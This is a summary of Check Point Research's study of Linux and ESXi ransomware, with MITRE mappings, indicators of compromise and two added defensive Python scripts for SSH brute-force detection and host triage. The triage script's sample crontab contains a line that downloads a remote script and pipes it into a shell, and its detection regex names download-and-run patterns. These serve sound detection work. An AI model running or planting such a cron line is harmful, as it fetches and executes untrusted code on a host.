Check Point Research analyzes Linux- and ESXi-targeting ransomware across 12 families, highlighting rising activity and cross-platform development. The study finds Linux variants are usually encryption-focused and simpler than their Windows counterparts, with OpenSSL as the usual crypto library and ChaCha20/RSA or AES/RSA as the common hybrid scheme, and notes that ESXi hosts are a preferred target because a single compromised hypervisor gives access to every virtual machine it runs. #Babuk #ESXi #Cl0p #HelloKitty #GwisinLocker #Monti #IceFire #Royal #LockBit #BlackCat
Keypoints
- Check Point Research documents a rise in ransomware targeting Linux systems and ESXi virtualization environments, including cross-platform tools built with Golang or Rust.
- Linux variants tend to be minimalist, often focusing on encryption with external scripts/configurations to drive the attack flow.
- The release of Babuk’s source code in 2021 accelerated multiple Linux ransomware families through code reuse and adaptation.
- OpenSSL is the predominant crypto library in Linux ransomware; the common cryptographic pattern is a hybrid scheme, ChaCha20 or AES for file contents with RSA protecting the symmetric key (ChaCha20/RSA or AES/RSA).
- Infection vectors for Linux/ESXi ransomware center on exposed services, vulnerability exploitation, webshells, stolen credentials, and brute-force access, rather than broad phishing campaigns typical of Windows threats.
- ESXi targets are especially attractive because compromising one ESXi host can impact many virtual machines, increasing ransom leverage.
- Double extortion is expanding in Linux ransomware, with groups sometimes skipping encryption to exfiltrate data for extortion campaigns (e.g., Cl0p).
MITRE Techniques
- [T1486] Data Encrypted for Impact – Samples are stripped down to the file-encryption routine and rely on external configurations or scripts to drive the rest of the attack flow. “the extent to which the tool itself is simplified … reducing them to only the file encryption code”.
- [T1190] Exploit Public-Facing Application – Exploitation of vulnerabilities on exposed services is a main infection vector. “The exploitation of vulnerabilities found on exposed services is one of ransomware’s main means of infection.”
- [T1505.003] Web Shell – Webshells are used as backdoors to maintain access after initial compromise. “The Webshells act as backdoors and allow the actors to maintain access to these servers after reboots.”
- [T1110] Brute Force – Brute-force attacks against exposed services to gain server access. “brute force attacks trying to gain access to the servers through weak credentials.”
- [T1078] Valid Accounts – Access via stolen credentials, notably SSH, is highlighted as a growing infection path. “Gaining access with stolen credentials, for example, using SSH.”
- [T1053.005] Scheduled Task/Job: Cron – Persistence on Linux is gained through cron jobs, the counterpart of the Windows Task Scheduler. “Cron Jobs (the equivalent of the Windows Task Scheduler) to gain persistence.”
- [T1041] Exfiltration Over C2 Channel – Data theft for double extortion, with the exfiltrated data used in later extortion campaigns. “Ransomware groups have been exploiting double extortion … to expose their victims’ sensitive information.”
- [T1070.004] File Deletion – Some ransomware self-delete after execution or remove traces. “the malware has the ability to self-delete after execution.”
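The brute-force and stolen-credential vectors above (T1110, T1078) leave a recognisable trace in sshd logs: a burst of failures from one source followed by an accepted login. The detection below is an added example written for this page, not code from the Check Point report. The log lines are constructed to mimic OpenSSH auth.log entries, the host name and IP addresses are hypothetical, and the five-failure threshold is an assumption to tune per environment.

```python
"""Flag SSH logins that follow a burst of failures from the same source (T1110 -> T1078).

Added example, not part of the Check Point report. SAMPLE_LOG is constructed
to look like OpenSSH lines from /var/log/auth.log; hosts and IPs are hypothetical.
"""
import re
from collections import defaultdict

# Constructed sshd log excerpt (hypothetical host "esxi-mgmt", documentation-range IPs)
SAMPLE_LOG = """\
Jun 10 03:14:01 esxi-mgmt sshd[2310]: Failed password for root from 203.0.113.7 port 50211 ssh2
Jun 10 03:14:03 esxi-mgmt sshd[2310]: Failed password for root from 203.0.113.7 port 50212 ssh2
Jun 10 03:14:05 esxi-mgmt sshd[2310]: Failed password for invalid user admin from 203.0.113.7 port 50213 ssh2
Jun 10 03:14:07 esxi-mgmt sshd[2310]: Failed password for root from 203.0.113.7 port 50214 ssh2
Jun 10 03:14:09 esxi-mgmt sshd[2310]: Failed password for root from 203.0.113.7 port 50215 ssh2
Jun 10 03:14:12 esxi-mgmt sshd[2310]: Accepted password for root from 203.0.113.7 port 50216 ssh2
Jun 10 03:20:44 esxi-mgmt sshd[2401]: Accepted publickey for backup from 198.51.100.9 port 41022 ssh2
Jun 10 03:21:02 esxi-mgmt sshd[2402]: Failed password for backup from 198.51.100.9 port 41023 ssh2
"""

# "invalid user" is optional: it appears when the account does not exist on the host
FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted (\w+) for (\S+) from (\S+) port")


def find_bruteforce_logins(log_text, threshold=5):
    """Return one alert per source that logs in after >= threshold failures.

    Failures are counted per source address, not per account, so a spray that
    rotates user names is still caught. Each alert is a tuple
    (source_ip, user, auth_method, failures_before_success).
    The threshold of 5 is an assumption; tune it to your environment.
    """
    failures = defaultdict(int)
    alerts = []
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group(2)] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            method, user, ip = m.groups()
            if failures[ip] >= threshold:
                alerts.append((ip, user, method, failures[ip]))
            failures[ip] = 0  # reset so each burst is reported once
    return alerts


if __name__ == "__main__":
    for ip, user, method, n in find_bruteforce_logins(SAMPLE_LOG):
        print(f"ALERT {ip}: '{user}' accepted via {method} after {n} failed attempts")
```

Point it at /var/log/auth.log (or the output of `journalctl -u ssh`) instead of SAMPLE_LOG. The publickey login from the second address produces no alert because no failures precede it; catching a stolen key used from a never-before-seen address needs a baseline of known source addresses, which this snippet does not keep.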
Indicators of Compromise
- [Hash] File hash – b711579e33b0df2143c7cb61246233c7f9b4d53db6a048427a58c0295d8daf1c, d1ba6260e2c6bf82be1d6815e19a1128aa0880f162a0691f667061c8fe8f1b2c, and 1 more hash
- [File Name] Potential ransom notes – How To Restore Your Files.txt, README_C_I_0P.TXT
- [Directory] Target directories (Linux) – /home, /root, and 2 more directories (e.g., /opt, /var/log)
- [File Path] Lock-file (mutex) indicators – /tmp/locker.pid, /tmp/.66486f04-bf24-4f5e-ae16-0af0fdb3d8fe
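The cron persistence item above and the indicators in this section can be turned into a quick host-triage check. This is an added example, not tooling from Check Point Research: the hashes, ransom note names and /tmp lock-file paths are the ones listed on this page, while the directory and cron file lists, the suspicious-cron heuristics and the demo tree built by make_demo_tree() are assumptions made for the example (no malware is written; the demo "sample" is a placeholder whose hash is computed on the spot).

```python
"""Host triage for the Linux/ESXi ransomware indicators listed on this page.

Added example, not Check Point tooling. Indicator values come from the page;
directory/cron lists, the cron regex and the demo tree are assumptions.
"""
import hashlib
import os
import re
import tempfile

RANSOM_NOTE_NAMES = {"How To Restore Your Files.txt", "README_C_I_0P.TXT"}
LOCK_FILE_PATHS = {"/tmp/locker.pid", "/tmp/.66486f04-bf24-4f5e-ae16-0af0fdb3d8fe"}
KNOWN_SHA256 = {
    "b711579e33b0df2143c7cb61246233c7f9b4d53db6a048427a58c0295d8daf1c",
    "d1ba6260e2c6bf82be1d6815e19a1128aa0880f162a0691f667061c8fe8f1b2c",
}
# Heuristic (assumption): cron entries that run from world-writable staging
# dirs, pipe a download into a shell, or decode base64 deserve a look.
SUSPICIOUS_CRON_RE = re.compile(
    r"/tmp/|/dev/shm/|\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b|\bbase64\s+-d\b")

# Constructed crontab for a dry run; the download URL is hypothetical.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * /tmp/.x/update >/dev/null 2>&1
@reboot curl -s http://192.0.2.10/a.sh | sh
"""


def sha256_of(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_tree(root, known_hashes=KNOWN_SHA256, rel_to=None, max_size=50 * 1024 * 1024):
    """Walk root and return sorted (kind, path) findings.

    Paths are reported relative to rel_to (default: root) with a leading "/",
    so a live run from "/" and a staged copy of a disk image report the same
    strings. Files above max_size are not hashed (assumption, to bound I/O).
    """
    rel_to = rel_to or root
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = "/" + os.path.relpath(full, rel_to).replace(os.sep, "/")
            if name in RANSOM_NOTE_NAMES:
                findings.append(("ransom_note", rel))
            if rel in LOCK_FILE_PATHS:
                findings.append(("lock_file", rel))
            try:
                if os.path.getsize(full) <= max_size and sha256_of(full) in known_hashes:
                    findings.append(("known_hash", rel))
            except OSError:
                continue  # unreadable or vanished file; keep going
    return sorted(findings)


def scan_cron_text(text):
    """Return non-comment crontab lines matching the staging/download heuristic."""
    hits = []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped and not stripped.startswith("#") and SUSPICIOUS_CRON_RE.search(stripped):
            hits.append(stripped)
    return hits


def make_demo_tree():
    """Constructed layout: a ransom note, a lock file and a placeholder 'sample'.
    Returns (root, sha256 of the placeholder) so the hash check can be exercised
    without any real sample on disk."""
    root = tempfile.mkdtemp(prefix="triage-demo-")
    for sub in ("home/victim", "tmp", "opt"):
        os.makedirs(os.path.join(root, sub))
    with open(os.path.join(root, "home", "victim", "How To Restore Your Files.txt"), "w") as f:
        f.write("constructed ransom note\n")
    with open(os.path.join(root, "tmp", "locker.pid"), "w") as f:
        f.write("4242\n")
    sample = os.path.join(root, "opt", "payload.bin")
    with open(sample, "wb") as f:
        f.write(b"constructed placeholder, not malware")
    return root, sha256_of(sample)


def triage(roots=("/home", "/root", "/opt", "/var/log"),
           cron_files=("/etc/crontab", "/var/spool/cron/crontabs/root")):
    """Live-host run over the page's target directories, the lock-file paths and
    cron files. The cron file list is an assumption; add /etc/cron.d/* and
    per-user crontabs for your distribution."""
    findings = [("lock_file", p) for p in sorted(LOCK_FILE_PATHS) if os.path.exists(p)]
    for r in roots:
        if os.path.isdir(r):
            findings.extend(scan_tree(r, rel_to="/"))
    for c in cron_files:
        if os.path.isfile(c):
            with open(c, errors="replace") as f:
                findings.extend(("cron", f"{c}: {l}") for l in scan_cron_text(f.read()))
    return findings


if __name__ == "__main__":
    for kind, detail in triage():
        print(kind, detail)
```

On an ESXi host the same checks apply, but datastores under /vmfs/volumes (an addition not listed on this page) are where encrypted VM files and ransom notes usually land, so add them to `roots`. Hash matching only catches the exact samples listed; treat a ransom note or lock file hit as the stronger signal and pull the binary for analysis rather than relying on the hash list.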